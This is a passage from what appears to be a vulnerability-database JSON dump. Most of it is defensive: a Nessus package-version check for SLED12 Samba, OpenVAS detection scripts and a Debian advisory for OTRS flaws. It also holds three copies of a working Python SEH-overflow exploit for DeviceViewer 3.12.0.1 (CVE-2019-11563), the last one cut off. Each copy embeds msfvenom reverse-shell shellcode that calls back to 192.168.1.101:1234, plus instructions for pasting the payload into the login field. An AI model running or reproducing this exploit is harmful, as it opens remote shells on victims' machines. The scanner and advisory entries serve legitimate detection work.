sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debugsource-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-4.2.4-18.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-29T19:29:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13458", "CVE-2019-12248", "CVE-2018-11563", "CVE-2019-12746"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-08-15T00:00:00", "id": "OPENVAS:1361412562310891877", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891877", "type": "openvas", "title": "Debian LTS: Security Advisory for otrs2 (DLA-1877-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891877\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-11563\", \"CVE-2019-12248\", \"CVE-2019-12746\", \"CVE-2019-13458\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-08-15 02:00:15 +0000 (Thu, 15 Aug 2019)\");\n script_name(\"Debian LTS: Security Advisory for otrs2 (DLA-1877-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00018.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1877-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'otrs2'\n package(s) announced via the DLA-1877-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several security issues have been fixed in otrs2, a well known trouble\nticket system.\n\nCVE-2018-11563\n\nAn attacker who is logged into OTRS as a customer can use the ticket\noverview screen to disclose internal article information of their\ncustomer tickets.\n\nCVE-2019-12746\n\nA user logged into OTRS as an agent might unknowingly disclose their\nsession ID by sharing the link of an embedded ticket article with\nthird parties. This identifier can be then potentially abused in\norder to impersonate the agent user.\n\nCVE-2019-13458\n\nAn attacker who is logged into OTRS as an agent user with\nappropriate permissions can leverage OTRS tags in templates in order\nto disclose hashed user passwords.\n\nDue to an incomplete fix for CVE-2019-12248, viewing email attachments\nwas no longer possible. This update correctly implements the new\nTicket::Fronted::BlockLoadingRemoteContent option.\");\n\n script_tag(name:\"affected\", value:\"'otrs2' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.3.18-1+deb8u11.\n\nWe recommend that you upgrade your otrs2 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"otrs\", ver:\"3.3.18-1+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"otrs2\", ver:\"3.3.18-1+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-07-16T14:50:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11563"], "description": "OTRS is prone to a privilege escalation vulnerability.", "modified": "2019-07-15T00:00:00", "published": "2019-07-15T00:00:00", "id": "OPENVAS:1361412562310142603", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142603", "type": "openvas", "title": "OTRS 6.0.x < 6.0.8 Privilege Escalation Vulnerability (OSA-2018-02)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:otrs:otrs\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142603\");\n script_version(\"2019-07-15T09:47:39+0000\");\n script_tag(name:\"last_modification\", value:\"2019-07-15 09:47:39 +0000 (Mon, 15 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-15 09:43:08 +0000 (Mon, 15 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:N\");\n\n script_cve_id(\"CVE-2018-11563\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"OTRS 6.0.x < 6.0.8 Privilege Escalation Vulnerability (OSA-2018-02)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_otrs_detect.nasl\");\n script_mandatory_keys(\"OTRS/installed\");\n\n script_tag(name:\"summary\", value:\"OTRS is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An attacker who is logged into OTRS as a customer can use the ticket overview\n screen to disclose internal article information of their customer tickets.\");\n\n script_tag(name:\"affected\", value:\"OTRS 6.0.x prior to version 6.0.8.\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.0.8 or later.\");\n\n script_xref(name:\"URL\", value:\"https://community.otrs.com/security-advisory-2018-02-security-update-for-otrs-framework/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\nlocation = infos['location'];\n\nif (version_in_range(version: version, test_version: \"6.0\", test_version2: \"6.0.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.0.8\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:09:01", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13458", "CVE-2019-12248", "CVE-2018-11563", "CVE-2019-12746"], "description": "Package : otrs2\nVersion : 3.3.18-1+deb8u11\nCVE ID : CVE-2018-11563 CVE-2019-12746 CVE-2019-13458\n\n\nSeveral security issues have been fixed in otrs2, a well known trouble\nticket system.\n\nCVE-2018-11563\n\n An attacker who is logged into OTRS as a customer can use the ticket\n overview screen to disclose internal article information of their\n customer tickets.\n\nCVE-2019-12746\n\n A user logged into OTRS as an agent might unknowingly disclose their\n session ID by sharing the link of an embedded ticket article with\n third parties. This identifier can be then potentially abused in\n order to impersonate the agent user.\n\nCVE-2019-13458\n\n An attacker who is logged into OTRS as an agent user with\n appropriate permissions can leverage OTRS tags in templates in order\n to disclose hashed user passwords.\n\n\nDue to an incomplete fix for CVE-2019-12248, viewing email attachments\nwas no longer possible. This update correctly implements the new\nTicket::Fronted::BlockLoadingRemoteContent option.\n\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n3.3.18-1+deb8u11.\n\nWe recommend that you upgrade your otrs2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 7, "modified": "2019-08-14T11:55:29", "published": "2019-08-14T11:55:29", "id": "DEBIAN:DLA-1877-1:AA33F", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201908/msg00018.html", "title": "[SECURITY] [DLA 1877-1] otrs2 security update", "type": "debian", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N"}}], "zdt": [{"lastseen": "2019-05-02T03:55:24", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2019-05-01T00:00:00", "title": "DeviceViewer 3.12.0.1 - user SEH Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11563"], "modified": "2019-05-01T00:00:00", "id": "1337DAY-ID-32630", "href": "https://0day.today/exploit/description/32630", "sourceData": "# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)\r\n# Exploit Author: Hayden Wright\r\n# Vendor Homepage: www.sricam.com/\r\n# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe\r\n# Version: v3.12.0.1\r\n# Tested on: Windows XP Pro x64, Windows 7 32bit\r\n# CVE : CVE-2019-11563\r\n\r\n#!/usr/bin/python\r\nimport struct\r\n\r\n#------------------------------------------------------------#\r\n# CVE-2019-11563 #\r\n# #\r\n# Sricam DeviceViewer.exe 'username' field SEH overflow #\r\n# by Hayden Wright #\r\n# #\r\n# (*) badchars = '\\x00\\x0a\\x0d' #\r\n# (*) SEH = 0x6a413969 OFFSET 268 #\r\n# (*) nSEH = 268 -4 #\r\n# #\r\n# 69901d06 5E POP ESI #\r\n# 69901d07 5F POP EDI #\r\n# 69901d08 C3 RETN #\r\n# #\r\n#------------------------------------------------------------#\r\n\r\n#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\\x00\\x0a\\x0d' -a x86 --platform windows EXITFUNC=seh\r\n\r\nshellcode =(\r\n\"\\xb8\\x51\\x9c\\x1c\\xa4\\xda\\xc9\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\r\n\"\\x52\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x13\\x92\\xfe\\x51\\x6f\\x42\\x7c\"\r\n\"\\x99\\x8f\\x93\\xe1\\x13\\x6a\\xa2\\x21\\x47\\xff\\x95\\x91\\x03\\xad\\x19\"\r\n\"\\x59\\x41\\x45\\xa9\\x2f\\x4e\\x6a\\x1a\\x85\\xa8\\x45\\x9b\\xb6\\x89\\xc4\"\r\n\"\\x1f\\xc5\\xdd\\x26\\x21\\x06\\x10\\x27\\x66\\x7b\\xd9\\x75\\x3f\\xf7\\x4c\"\r\n\"\\x69\\x34\\x4d\\x4d\\x02\\x06\\x43\\xd5\\xf7\\xdf\\x62\\xf4\\xa6\\x54\\x3d\"\r\n\"\\xd6\\x49\\xb8\\x35\\x5f\\x51\\xdd\\x70\\x29\\xea\\x15\\x0e\\xa8\\x3a\\x64\"\r\n\"\\xef\\x07\\x03\\x48\\x02\\x59\\x44\\x6f\\xfd\\x2c\\xbc\\x93\\x80\\x36\\x7b\"\r\n\"\\xe9\\x5e\\xb2\\x9f\\x49\\x14\\x64\\x7b\\x6b\\xf9\\xf3\\x08\\x67\\xb6\\x70\"\r\n\"\\x56\\x64\\x49\\x54\\xed\\x90\\xc2\\x5b\\x21\\x11\\x90\\x7f\\xe5\\x79\\x42\"\r\n\"\\xe1\\xbc\\x27\\x25\\x1e\\xde\\x87\\x9a\\xba\\x95\\x2a\\xce\\xb6\\xf4\\x22\"\r\n\"\\x23\\xfb\\x06\\xb3\\x2b\\x8c\\x75\\x81\\xf4\\x26\\x11\\xa9\\x7d\\xe1\\xe6\"\r\n\"\\xce\\x57\\x55\\x78\\x31\\x58\\xa6\\x51\\xf6\\x0c\\xf6\\xc9\\xdf\\x2c\\x9d\"\r\n\"\\x09\\xdf\\xf8\\x32\\x59\\x4f\\x53\\xf3\\x09\\x2f\\x03\\x9b\\x43\\xa0\\x7c\"\r\n\"\\xbb\\x6c\\x6a\\x15\\x56\\x97\\xfd\\xda\\x0f\\x96\\x98\\xb2\\x4d\\x98\\x66\"\r\n\"\\x91\\xdb\\x7e\\x0c\\x05\\x8a\\x29\\xb9\\xbc\\x97\\xa1\\x58\\x40\\x02\\xcc\"\r\n\"\\x5b\\xca\\xa1\\x31\\x15\\x3b\\xcf\\x21\\xc2\\xcb\\x9a\\x1b\\x45\\xd3\\x30\"\r\n\"\\x33\\x09\\x46\\xdf\\xc3\\x44\\x7b\\x48\\x94\\x01\\x4d\\x81\\x70\\xbc\\xf4\"\r\n\"\\x3b\\x66\\x3d\\x60\\x03\\x22\\x9a\\x51\\x8a\\xab\\x6f\\xed\\xa8\\xbb\\xa9\"\r\n\"\\xee\\xf4\\xef\\x65\\xb9\\xa2\\x59\\xc0\\x13\\x05\\x33\\x9a\\xc8\\xcf\\xd3\"\r\n\"\\x5b\\x23\\xd0\\xa5\\x63\\x6e\\xa6\\x49\\xd5\\xc7\\xff\\x76\\xda\\x8f\\xf7\"\r\n\"\\x0f\\x06\\x30\\xf7\\xda\\x82\\x4e\\x09\\xd6\\x1e\\xc6\\xb0\\x83\\x62\\x8a\"\r\n\"\\x42\\x7e\\xa0\\xb3\\xc0\\x8a\\x59\\x40\\xd8\\xff\\x5c\\x0c\\x5e\\xec\\x2c\"\r\n\"\\x1d\\x0b\\x12\\x82\\x1e\\x1e\")\r\n\r\nmax_size = 4000\r\n\r\nbuf = 'A'*264\r\nbuf += '\\xeb\\x06\\x90\\x90' #jump short 6-bytes\r\nbuf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll\r\nbuf += '\\x90' * 16\r\nbuf += shellcode\r\nbuf += 'C'*(max_size - len(buf))\r\n\r\nprint '[+] %s bytes buffer created...' %len(buf)\r\n\r\ntry:\r\n filename = 'CVE-2019-11563.txt'\r\n file = open(filename , 'w')\r\n file.write(buf)\r\n print '[+] Evil buffer saved to file: ' + filename\r\n print '[+] Copy + paste its contents into the \"user\" field and hit login'\r\n file.close()\r\nexcept:\r\n print \"[!] Could not create file!\"\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32630"}], "exploitdb": [{"lastseen": "2019-04-30T16:19:44", "description": "", "published": "2019-04-30T00:00:00", "type": "exploitdb", "title": "DeviceViewer 3.12.0.1 - &#039;user&#039; SEH Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11563"], "modified": "2019-04-30T00:00:00", "id": "EDB-ID:46779", "href": "https://www.exploit-db.com/exploits/46779", "sourceData": "# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)\r\n# Discovery Date: 25/04/2019\r\n# Exploit Author: Hayden Wright\r\n# Vendor Homepage: www.sricam.com/\r\n# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe\r\n# Version: v3.12.0.1\r\n# Tested on: Windows XP Pro x64, Windows 7 32bit\r\n# CVE : CVE-2019-11563\r\n\r\n#!/usr/bin/python\r\nimport struct\r\n\r\n#------------------------------------------------------------#\r\n# CVE-2019-11563 #\r\n# #\r\n# Sricam DeviceViewer.exe 'username' field SEH overflow #\r\n# by Hayden Wright #\r\n# #\r\n# (*) badchars = '\\x00\\x0a\\x0d' #\r\n# (*) SEH = 0x6a413969 OFFSET 268 #\r\n# (*) nSEH = 268 -4 #\r\n# #\r\n# 69901d06 5E POP ESI #\r\n# 69901d07 5F POP EDI #\r\n# 69901d08 C3 RETN #\r\n# #\r\n#------------------------------------------------------------#\r\n\r\n#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\\x00\\x0a\\x0d' -a x86 --platform windows EXITFUNC=seh\r\n\r\nshellcode =(\r\n\"\\xb8\\x51\\x9c\\x1c\\xa4\\xda\\xc9\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\r\n\"\\x52\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x13\\x92\\xfe\\x51\\x6f\\x42\\x7c\"\r\n\"\\x99\\x8f\\x93\\xe1\\x13\\x6a\\xa2\\x21\\x47\\xff\\x95\\x91\\x03\\xad\\x19\"\r\n\"\\x59\\x41\\x45\\xa9\\x2f\\x4e\\x6a\\x1a\\x85\\xa8\\x45\\x9b\\xb6\\x89\\xc4\"\r\n\"\\x1f\\xc5\\xdd\\x26\\x21\\x06\\x10\\x27\\x66\\x7b\\xd9\\x75\\x3f\\xf7\\x4c\"\r\n\"\\x69\\x34\\x4d\\x4d\\x02\\x06\\x43\\xd5\\xf7\\xdf\\x62\\xf4\\xa6\\x54\\x3d\"\r\n\"\\xd6\\x49\\xb8\\x35\\x5f\\x51\\xdd\\x70\\x29\\xea\\x15\\x0e\\xa8\\x3a\\x64\"\r\n\"\\xef\\x07\\x03\\x48\\x02\\x59\\x44\\x6f\\xfd\\x2c\\xbc\\x93\\x80\\x36\\x7b\"\r\n\"\\xe9\\x5e\\xb2\\x9f\\x49\\x14\\x64\\x7b\\x6b\\xf9\\xf3\\x08\\x67\\xb6\\x70\"\r\n\"\\x56\\x64\\x49\\x54\\xed\\x90\\xc2\\x5b\\x21\\x11\\x90\\x7f\\xe5\\x79\\x42\"\r\n\"\\xe1\\xbc\\x27\\x25\\x1e\\xde\\x87\\x9a\\xba\\x95\\x2a\\xce\\xb6\\xf4\\x22\"\r\n\"\\x23\\xfb\\x06\\xb3\\x2b\\x8c\\x75\\x81\\xf4\\x26\\x11\\xa9\\x7d\\xe1\\xe6\"\r\n\"\\xce\\x57\\x55\\x78\\x31\\x58\\xa6\\x51\\xf6\\x0c\\xf6\\xc9\\xdf\\x2c\\x9d\"\r\n\"\\x09\\xdf\\xf8\\x32\\x59\\x4f\\x53\\xf3\\x09\\x2f\\x03\\x9b\\x43\\xa0\\x7c\"\r\n\"\\xbb\\x6c\\x6a\\x15\\x56\\x97\\xfd\\xda\\x0f\\x96\\x98\\xb2\\x4d\\x98\\x66\"\r\n\"\\x91\\xdb\\x7e\\x0c\\x05\\x8a\\x29\\xb9\\xbc\\x97\\xa1\\x58\\x40\\x02\\xcc\"\r\n\"\\x5b\\xca\\xa1\\x31\\x15\\x3b\\xcf\\x21\\xc2\\xcb\\x9a\\x1b\\x45\\xd3\\x30\"\r\n\"\\x33\\x09\\x46\\xdf\\xc3\\x44\\x7b\\x48\\x94\\x01\\x4d\\x81\\x70\\xbc\\xf4\"\r\n\"\\x3b\\x66\\x3d\\x60\\x03\\x22\\x9a\\x51\\x8a\\xab\\x6f\\xed\\xa8\\xbb\\xa9\"\r\n\"\\xee\\xf4\\xef\\x65\\xb9\\xa2\\x59\\xc0\\x13\\x05\\x33\\x9a\\xc8\\xcf\\xd3\"\r\n\"\\x5b\\x23\\xd0\\xa5\\x63\\x6e\\xa6\\x49\\xd5\\xc7\\xff\\x76\\xda\\x8f\\xf7\"\r\n\"\\x0f\\x06\\x30\\xf7\\xda\\x82\\x4e\\x09\\xd6\\x1e\\xc6\\xb0\\x83\\x62\\x8a\"\r\n\"\\x42\\x7e\\xa0\\xb3\\xc0\\x8a\\x59\\x40\\xd8\\xff\\x5c\\x0c\\x5e\\xec\\x2c\"\r\n\"\\x1d\\x0b\\x12\\x82\\x1e\\x1e\")\r\n\r\nmax_size = 4000\r\n\r\nbuf = 'A'*264\r\nbuf += '\\xeb\\x06\\x90\\x90' #jump short 6-bytes\r\nbuf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll\r\nbuf += '\\x90' * 16\r\nbuf += shellcode\r\nbuf += 'C'*(max_size - len(buf))\r\n\r\nprint '[+] %s bytes buffer created...' %len(buf)\r\n\r\ntry:\r\n filename = 'CVE-2019-11563.txt'\r\n file = open(filename , 'w')\r\n file.write(buf)\r\n print '[+] Evil buffer saved to file: ' + filename\r\n print '[+] Copy + paste its contents into the \"user\" field and hit login'\r\n file.close()\r\nexcept:\r\n print \"[!] Could not create file!\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46779"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:12", "description": "\nDeviceViewer 3.12.0.1 - user SEH Overflow", "edition": 1, "published": "2019-04-30T00:00:00", "title": "DeviceViewer 3.12.0.1 - user SEH Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11563"], "modified": "2019-04-30T00:00:00", "id": "EXPLOITPACK:217F4A7F20A47B151CAE739F6BD29D45", "href": "", "sourceData": "# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)\n# Discovery Date: 25/04/2019\n# Exploit Author: Hayden Wright\n# Vendor Homepage: www.sricam.com/\n# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe\n# Version: v3.12.0.1\n# Tested on: Windows XP Pro x64, Windows 7 32bit\n# CVE : CVE-2019-11563\n\n#!/usr/bin/python\nimport struct\n\n#------------------------------------------------------------#\n# CVE-2019-11563 #\n# #\n# Sricam DeviceViewer.exe 'username' field SEH overflow #\n# by Hayden Wright #\n# #\n# (*) badchars = '\\x00\\x0a\\x0d' #\n# (*) SEH = 